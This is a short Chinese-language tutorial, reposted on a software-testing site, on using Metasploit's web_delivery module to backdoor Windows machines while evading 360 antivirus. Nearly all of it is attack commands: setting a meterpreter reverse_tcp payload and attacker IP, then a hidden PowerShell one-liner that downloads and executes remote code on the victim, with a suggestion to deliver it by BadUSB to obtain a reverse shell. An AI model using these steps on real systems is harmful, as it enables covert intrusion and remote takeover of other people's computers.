Metasploit后门免杀模块绕过360

发表于:2018-1-17 11:33

字体: | 上一篇 | 下一篇 | 我要投稿

 作者:未知    来源:杂术馆

  1.第一步:使用msf的脚本后门模块
  use exploit/multi/script/web_delivery
  2.第二步:使用 show opinion 查看需要使用的相关参数
  show options
  可看到下列参数:需要选择的是target、payload选项(包含ip以及端口)、uripath等
  3.第三步:查看target 包含多少可选的目标选项,使用以下参数查看
  show targets
  可看到下列选项包含:Python/PHP/powershell
  
  4.第四步:设置target 我们这里选择2 —-powershell的这脚本
  set target 2
  5.第五步:设置payload选项,设置windows(powershell)反弹shell链接
  set payload windows/meterpreter/reverse_tcp
  6.第六步:设置攻击者-端口默认是:4444,也可以更改 我这里就不设置了,直接用默认的端口
  set LHOST 192.168.1.101
  7.第七步:设置uripath 路径 设置为根目录—– ‘/‘
  set URIPATH /
  8.第八步:执行后门
  exploit /
  9.第九步:将代码复制目标机器上cmd 下运行——-利用思路可以用到“Badusb”等多种思路
  powershell.exe -nop -w hidden -c $O=new-object net.webclient;$O.proxy=[Net.WebRequest]::GetSystemWebProxy();$O.Proxy.Credentials[Net.CredentialCache]::DefaultCredentials;IEX $O.downloadstring(‘http192。168。1。101:8080/‘); /度娘真的疯了 内网ip都吞
  10.可看到反弹shell
  session -i //查看回话ID 获取回话进入meterpreter 回话
  

上文内容不用于商业目的,如涉及知识产权问题,请权利人联系博为峰小编(021-64471599-8017),我们将立即处理。
《2023软件测试行业现状调查报告》独家发布~

关注51Testing

联系我们

快捷面板 站点地图 联系我们 广告服务 关于我们 站长统计 发展历程

法律顾问:上海兰迪律师事务所 项棋律师
版权所有 上海博为峰软件技术股份有限公司 Copyright©51testing.com 2003-2024
投诉及意见反馈:webmaster@51testing.com; 业务联系:service@51testing.com 021-64471599-8017

沪ICP备05003035号

沪公网安备 31010102002173号